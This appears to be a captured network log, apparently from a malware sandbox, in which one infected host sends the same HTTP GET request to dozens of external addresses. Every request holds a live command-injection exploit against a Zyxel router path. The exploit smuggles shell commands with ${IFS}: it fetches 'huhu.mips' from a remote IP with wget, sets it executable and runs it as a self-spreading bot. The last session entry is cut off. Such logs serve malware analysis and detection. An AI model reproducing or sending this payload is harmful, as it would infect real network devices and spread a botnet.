                                                Jan 29, 2024 07:08:01.609733105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7654192.168.2.233281295.230.253.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609771967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7655192.168.2.233930063.97.132.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609834909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7656192.168.2.234022861.17.200.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609860897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7657192.168.2.2340718178.129.105.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609900951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7658192.168.2.235428494.60.84.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609941959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7659192.168.2.233893258.248.95.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.609970093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7660192.168.2.233933242.179.144.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610006094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7661192.168.2.2346228154.129.227.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610055923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7662192.168.2.233719298.114.149.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610078096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7663192.168.2.2339342114.41.24.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610115051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7664192.168.2.2352466153.126.222.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610161066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7665192.168.2.2353820103.166.220.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610196114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7666192.168.2.234837080.179.105.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610249996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7667192.168.2.2344042189.77.231.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610271931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7668192.168.2.235001627.135.206.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610323906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7669192.168.2.235148036.140.11.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610362053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7670192.168.2.2344922103.21.3.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610399008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7671192.168.2.2345048129.112.72.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610459089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7672192.168.2.2341608209.187.39.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610511065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7673192.168.2.235721235.39.184.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610553026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7674192.168.2.235848242.35.46.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610613108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7675192.168.2.2338416149.255.205.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610649109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7676192.168.2.235263254.174.155.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610697985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7677192.168.2.2344468206.198.237.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610730886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7678192.168.2.2346106178.203.130.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610789061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7679192.168.2.2349722174.167.136.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610819101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7680192.168.2.23462784.65.250.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610857964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7681192.168.2.2332998130.16.24.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610903978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7682192.168.2.235596094.126.116.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610946894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7683192.168.2.2335582188.3.61.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.610996008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7684192.168.2.2339678198.89.210.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611092091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7685192.168.2.235442285.7.107.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611129999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7686192.168.2.2359674131.36.87.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611154079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7687192.168.2.2336362175.14.201.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611203909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7688192.168.2.2355554164.42.215.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611238003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7689192.168.2.2343770197.208.187.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611262083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7690192.168.2.235561843.236.140.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611295938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7691192.168.2.2357738134.52.144.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611341953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7692192.168.2.233786294.98.108.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611398935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7693192.168.2.233903085.14.147.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611443043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7694192.168.2.2334932146.229.203.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611469030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7695192.168.2.2335788208.206.52.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611520052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7696192.168.2.2344208117.163.98.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611557007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7697192.168.2.2354150113.160.189.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611589909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7698192.168.2.233500827.238.170.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611632109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7699192.168.2.2346722152.195.223.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611668110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7700192.168.2.2347898183.125.156.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611726046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7701192.168.2.23338381.191.27.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611771107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7702192.168.2.2359874185.208.46.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611810923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7703192.168.2.2351808149.48.203.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611849070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7704192.168.2.235717863.0.56.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611912966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7705192.168.2.2335028139.207.105.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611946106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7706192.168.2.2332854105.61.174.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.611996889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7707192.168.2.2360490185.12.79.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612018108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7708192.168.2.2360362220.190.52.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612061024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7709192.168.2.2345100212.116.8.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612111092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7710192.168.2.234967820.85.254.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612133980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7711192.168.2.2337510205.249.2.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612164021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7712192.168.2.2337220159.156.182.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612200022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7713192.168.2.234130088.99.152.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612237930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7714192.168.2.2355248223.61.50.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612267017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7715192.168.2.2333838175.108.172.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612324953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7716192.168.2.2335468205.234.36.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:01.612350941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7717192.168.2.233726637.210.61.47443
                                                TimestampBytes transferredDirectionData
